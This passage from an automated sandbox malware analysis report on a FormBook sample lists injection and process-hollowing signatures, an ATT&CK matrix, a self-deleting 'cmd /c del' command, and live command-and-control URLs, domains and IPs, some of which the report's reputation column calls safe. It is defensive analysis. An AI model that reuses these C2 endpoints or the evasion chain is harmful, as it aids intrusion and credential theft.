          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493D294 mov eax, dword ptr fs:[00000030h]10_2_0493D294
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0499FE87 mov eax, dword ptr fs:[00000030h]10_2_0499FE87
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491AAB0 mov eax, dword ptr fs:[00000030h]10_2_0491AAB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491AAB0 mov eax, dword ptr fs:[00000030h]10_2_0491AAB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493FAB0 mov eax, dword ptr fs:[00000030h]10_2_0493FAB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049052A5 mov eax, dword ptr fs:[00000030h]10_2_049052A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049052A5 mov eax, dword ptr fs:[00000030h]10_2_049052A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049052A5 mov eax, dword ptr fs:[00000030h]10_2_049052A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049052A5 mov eax, dword ptr fs:[00000030h]10_2_049052A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049052A5 mov eax, dword ptr fs:[00000030h]10_2_049052A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D0EA5 mov eax, dword ptr fs:[00000030h]10_2_049D0EA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D0EA5 mov eax, dword ptr fs:[00000030h]10_2_049D0EA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D0EA5 mov eax, dword ptr fs:[00000030h]10_2_049D0EA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049846A7 mov eax, dword ptr fs:[00000030h]10_2_049846A7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D8ED6 mov eax, dword ptr fs:[00000030h]10_2_049D8ED6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04948EC7 mov eax, dword ptr fs:[00000030h]10_2_04948EC7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04932ACB mov eax, dword ptr fs:[00000030h]10_2_04932ACB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049BFEC0 mov eax, dword ptr fs:[00000030h]10_2_049BFEC0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049336CC mov eax, dword ptr fs:[00000030h]10_2_049336CC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049316E0 mov ecx, dword ptr fs:[00000030h]10_2_049316E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049176E2 mov eax, dword ptr fs:[00000030h]10_2_049176E2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04932AE4 mov eax, dword ptr fs:[00000030h]10_2_04932AE4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04905210 mov eax, dword ptr fs:[00000030h]10_2_04905210
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04905210 mov ecx, dword ptr fs:[00000030h]10_2_04905210
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04905210 mov eax, dword ptr fs:[00000030h]10_2_04905210
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04905210 mov eax, dword ptr fs:[00000030h]10_2_04905210
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490AA16 mov eax, dword ptr fs:[00000030h]10_2_0490AA16
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490AA16 mov eax, dword ptr fs:[00000030h]10_2_0490AA16
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04923A1C mov eax, dword ptr fs:[00000030h]10_2_04923A1C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493A61C mov eax, dword ptr fs:[00000030h]10_2_0493A61C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493A61C mov eax, dword ptr fs:[00000030h]10_2_0493A61C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490C600 mov eax, dword ptr fs:[00000030h]10_2_0490C600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490C600 mov eax, dword ptr fs:[00000030h]10_2_0490C600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490C600 mov eax, dword ptr fs:[00000030h]10_2_0490C600
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04938E00 mov eax, dword ptr fs:[00000030h]10_2_04938E00
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C1608 mov eax, dword ptr fs:[00000030h]10_2_049C1608
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04918A0A mov eax, dword ptr fs:[00000030h]10_2_04918A0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049BFE3F mov eax, dword ptr fs:[00000030h]10_2_049BFE3F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490E620 mov eax, dword ptr fs:[00000030h]10_2_0490E620
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04944A2C mov eax, dword ptr fs:[00000030h]10_2_04944A2C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04944A2C mov eax, dword ptr fs:[00000030h]10_2_04944A2C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049CEA55 mov eax, dword ptr fs:[00000030h]10_2_049CEA55
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04994257 mov eax, dword ptr fs:[00000030h]10_2_04994257
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04909240 mov eax, dword ptr fs:[00000030h]10_2_04909240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04909240 mov eax, dword ptr fs:[00000030h]10_2_04909240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04909240 mov eax, dword ptr fs:[00000030h]10_2_04909240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04909240 mov eax, dword ptr fs:[00000030h]10_2_04909240
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04917E41 mov eax, dword ptr fs:[00000030h]10_2_04917E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04917E41 mov eax, dword ptr fs:[00000030h]10_2_04917E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04917E41 mov eax, dword ptr fs:[00000030h]10_2_04917E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04917E41 mov eax, dword ptr fs:[00000030h]10_2_04917E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04917E41 mov eax, dword ptr fs:[00000030h]10_2_04917E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04917E41 mov eax, dword ptr fs:[00000030h]10_2_04917E41
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049CAE44 mov eax, dword ptr fs:[00000030h]10_2_049CAE44
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049CAE44 mov eax, dword ptr fs:[00000030h]10_2_049CAE44
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0492AE73 mov eax, dword ptr fs:[00000030h]10_2_0492AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0492AE73 mov eax, dword ptr fs:[00000030h]10_2_0492AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0492AE73 mov eax, dword ptr fs:[00000030h]10_2_0492AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0492AE73 mov eax, dword ptr fs:[00000030h]10_2_0492AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0492AE73 mov eax, dword ptr fs:[00000030h]10_2_0492AE73
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0494927A mov eax, dword ptr fs:[00000030h]10_2_0494927A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049BB260 mov eax, dword ptr fs:[00000030h]10_2_049BB260
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049BB260 mov eax, dword ptr fs:[00000030h]10_2_049BB260
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491766D mov eax, dword ptr fs:[00000030h]10_2_0491766D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D8A62 mov eax, dword ptr fs:[00000030h]10_2_049D8A62
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493B390 mov eax, dword ptr fs:[00000030h]10_2_0493B390
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04932397 mov eax, dword ptr fs:[00000030h]10_2_04932397
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04918794 mov eax, dword ptr fs:[00000030h]10_2_04918794
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04987794 mov eax, dword ptr fs:[00000030h]10_2_04987794
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04987794 mov eax, dword ptr fs:[00000030h]10_2_04987794
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04987794 mov eax, dword ptr fs:[00000030h]10_2_04987794
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C138A mov eax, dword ptr fs:[00000030h]10_2_049C138A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049BD380 mov ecx, dword ptr fs:[00000030h]10_2_049BD380
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04911B8F mov eax, dword ptr fs:[00000030h]10_2_04911B8F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04911B8F mov eax, dword ptr fs:[00000030h]10_2_04911B8F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D5BA5 mov eax, dword ptr fs:[00000030h]10_2_049D5BA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04934BAD mov eax, dword ptr fs:[00000030h]10_2_04934BAD
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04934BAD mov eax, dword ptr fs:[00000030h]10_2_04934BAD
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04934BAD mov eax, dword ptr fs:[00000030h]10_2_04934BAD
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049853CA mov eax, dword ptr fs:[00000030h]10_2_049853CA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049853CA mov eax, dword ptr fs:[00000030h]10_2_049853CA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049437F5 mov eax, dword ptr fs:[00000030h]10_2_049437F5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049303E2 mov eax, dword ptr fs:[00000030h]10_2_049303E2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049303E2 mov eax, dword ptr fs:[00000030h]10_2_049303E2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049303E2 mov eax, dword ptr fs:[00000030h]10_2_049303E2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049303E2 mov eax, dword ptr fs:[00000030h]10_2_049303E2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049303E2 mov eax, dword ptr fs:[00000030h]10_2_049303E2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049303E2 mov eax, dword ptr fs:[00000030h]10_2_049303E2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0492DBE9 mov eax, dword ptr fs:[00000030h]10_2_0492DBE9
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0492F716 mov eax, dword ptr fs:[00000030h]10_2_0492F716
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049C131B mov eax, dword ptr fs:[00000030h]10_2_049C131B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0499FF10 mov eax, dword ptr fs:[00000030h]10_2_0499FF10
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0499FF10 mov eax, dword ptr fs:[00000030h]10_2_0499FF10
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D070D mov eax, dword ptr fs:[00000030h]10_2_049D070D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D070D mov eax, dword ptr fs:[00000030h]10_2_049D070D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493A70E mov eax, dword ptr fs:[00000030h]10_2_0493A70E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493A70E mov eax, dword ptr fs:[00000030h]10_2_0493A70E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0493E730 mov eax, dword ptr fs:[00000030h]10_2_0493E730
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04904F2E mov eax, dword ptr fs:[00000030h]10_2_04904F2E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04904F2E mov eax, dword ptr fs:[00000030h]10_2_04904F2E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D8B58 mov eax, dword ptr fs:[00000030h]10_2_049D8B58
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490F358 mov eax, dword ptr fs:[00000030h]10_2_0490F358
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490DB40 mov eax, dword ptr fs:[00000030h]10_2_0490DB40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491EF40 mov eax, dword ptr fs:[00000030h]10_2_0491EF40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04933B7A mov eax, dword ptr fs:[00000030h]10_2_04933B7A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_04933B7A mov eax, dword ptr fs:[00000030h]10_2_04933B7A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0490DB60 mov ecx, dword ptr fs:[00000030h]10_2_0490DB60
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_0491FF60 mov eax, dword ptr fs:[00000030h]10_2_0491FF60
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 10_2_049D8F6A mov eax, dword ptr fs:[00000030h]10_2_049D8F6A
          Source: C:\Users\user\Desktop\20210113432.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 74.208.236.28 80Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\20210113432.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\20210113432.exeThread register set: target process: 3292Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeThread register set: target process: 3292Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\20210113432.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\20210113432.exeSection unmapped: C:\Windows\SysWOW64\cmstp.exe base address: DE0000Jump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeProcess created: C:\Users\user\Desktop\20210113432.exe C:\Users\user\Desktop\20210113432.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\20210113432.exe'Jump to behavior
          Source: explorer.exe, 00000003.00000000.258758513.0000000001400000.00000002.00000001.sdmp, cmstp.exe, 0000000A.00000002.610144193.0000000003190000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
          Source: explorer.exe, 00000003.00000002.623472452.0000000005F40000.00000004.00000001.sdmp, cmstp.exe, 0000000A.00000002.610144193.0000000003190000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.258758513.0000000001400000.00000002.00000001.sdmp, cmstp.exe, 0000000A.00000002.610144193.0000000003190000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.607576651.0000000000EB8000.00000004.00000020.sdmpBinary or memory string: ProgmanX
          Source: explorer.exe, 00000003.00000000.258758513.0000000001400000.00000002.00000001.sdmp, cmstp.exe, 0000000A.00000002.610144193.0000000003190000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.278178947.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndAj
          Source: C:\Users\user\Desktop\20210113432.exeQueries volume information: C:\Users\user\Desktop\20210113432.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\20210113432.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.20210113432.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.20210113432.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.292282705.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292860797.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292893509.0000000000FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.608235270.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.608474774.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.255709550.0000000003E39000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.606729919.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.20210113432.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.20210113432.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection512LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing12Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 339348 Sample: 20210113432.exe Startdate: 13/01/2021 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 7 other signatures 2->42 10 20210113432.exe 3 2->10         started        process3 file4 28 C:\Users\user\AppData\...\20210113432.exe.log, ASCII 10->28 dropped 52 Tries to detect virtualization through RDTSC time measurements 10->52 14 20210113432.exe 10->14         started        signatures5 process6 signatures7 54 Modifies the context of a thread in another process (thread injection) 14->54 56 Maps a DLL or memory area into another process 14->56 58 Sample uses process hollowing technique 14->58 60 Queues an APC in another process (thread injection) 14->60 17 explorer.exe 14->17 injected process8 dnsIp9 30 www.fordexplorerproblems.com 74.208.236.28, 49757, 80 ONEANDONE-ASBrauerstrasse48DE United States 17->30 32 exoticorganicwine.com 34.102.136.180, 49756, 49759, 80 GOOGLEUS United States 17->32 34 7 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 21 cmstp.exe 17->21         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Tries to detect virtualization through RDTSC time measurements 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          20210113432.exe28%VirustotalBrowse
          20210113432.exe26%ReversingLabsByteCode-MSIL.Trojan.Taskun
          20210113432.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.2.20210113432.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.exoticorganicwine.com/dkk/?EvI=Pne6zO+Z3a60Au06FHOmVrHS7z/OeLQppxmg+doCWmhHZjdmG5KKLECfP4ZcwEOpNG8I7WvO0Q==&J49Tz=eln47v8hVLB0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://tempuri.org/_391backDataSet.xsd0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.southsideflooringcreations.com/dkk/?J49Tz=eln47v8hVLB&EvI=7pEhCqXKdTe1QojMxaT2YAvmPyLKOFb2Iw59nqg2WrUGKA2vL6+QIvazxlaHaXA0UWVS/p1klg==0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.miproper.com/dkk/?J49Tz=eln47v8hVLB&EvI=KFec6V/xGjD6cE5qsvd2LTm4Ze1Ufxo42AYbq86iepN500M2vfXbQq6XlD5K+sbe3doaSuc2kQ==0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          miproper.com
          		34.102.136.180
          		truetrue
            		unknown
            southsideflooringcreations.com
            		184.168.131.241
            		truetrue
              		unknown
              exoticorganicwine.com
              		34.102.136.180
